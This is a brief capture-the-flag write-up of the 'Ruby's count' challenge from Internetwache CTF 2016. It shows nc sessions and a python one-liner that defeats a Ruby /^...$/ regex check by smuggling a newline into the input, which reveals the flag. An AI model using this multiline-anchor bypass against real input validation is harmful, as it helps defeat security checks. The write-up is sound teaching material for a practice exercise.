English [Internetwache CTF 2016] [Exploit 50 – Ruby s count] Write Up

Description

Ruby’s count
(exp50, solved by 219)

Description: Hi, my name is Ruby. I like converting characters into ascii values and then calculating the sum.

Service: 188.166.133.53:12037

Resolution

We connect to the service and we try different things:

laxa:Challenges:23:54:27$ nc 188.166.133.53 12037
Let me count the ascii values of 10 characters:
ffffffffff
Sum is: 1020
That's not enough (1020 < 1020) 
laxa:Challenges:23:58:50$ nc 188.166.133.53 12037
Let me count the ascii values of 10 characters:
wwdwd
WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !

Then with a little of research we find this, we then do that:

laxa:RubysCount:16:16:31$ python -c 'print "1\nffffffffff"' | nc -nvvv 188.166.133.53 12037
(UNKNOWN) [188.166.133.53] 12037 (?) open
Let me count the ascii values of 10 characters:
Sum is: 1079
IW{RUBY_R3G3X_F41L}

Flag is: IW{RUBY_R3G3X_F41L}

Leave a Reply

Your email address will not be published. Required fields are marked *